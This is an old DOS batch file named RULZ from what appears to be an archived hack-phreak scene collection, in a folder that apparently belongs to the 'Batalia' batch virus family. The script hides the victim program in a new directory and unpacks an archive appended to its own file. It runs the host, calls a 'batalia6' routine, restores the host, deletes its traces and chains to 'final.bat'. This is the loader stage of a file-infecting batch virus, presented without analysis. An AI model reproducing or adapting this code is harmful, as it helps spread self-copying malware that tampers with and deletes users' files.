home *** CD-ROM | disk | FTP | other *** search
/ Collection of Hack-Phreak Scene Programs / cleanhpvac.zip / cleanhpvac / BATCHCOL.ZIP / TOOLS.ZIP / BATALIA.ZIP / BATALIA6.ZIP / RULZ < prev    next >
Text File  |  1996-05-22  |  302b  |  22 lines

  1. @echo off
  2. md S_G_W_W
  3. cd S_G_W_W
  4. copy ..\%1 wait > nul
  5. del ..\%1 > nul
  6. arj x ..\%0.bat > nul
  7. copy %1 ..\%1 >nul
  8. cd ..
  9. call %1
  10. cd s_g_w_w
  11. del ..\%1
  12. del %1
  13. call batalia6
  14. copy wait ..\%1 >nul
  15. del wait
  16. del rulz
  17. del zagl 
  18. del batalia6.bat
  19. copy final.bat ..\final.bat >nul
  20. cd ..
  21. final %0
  22.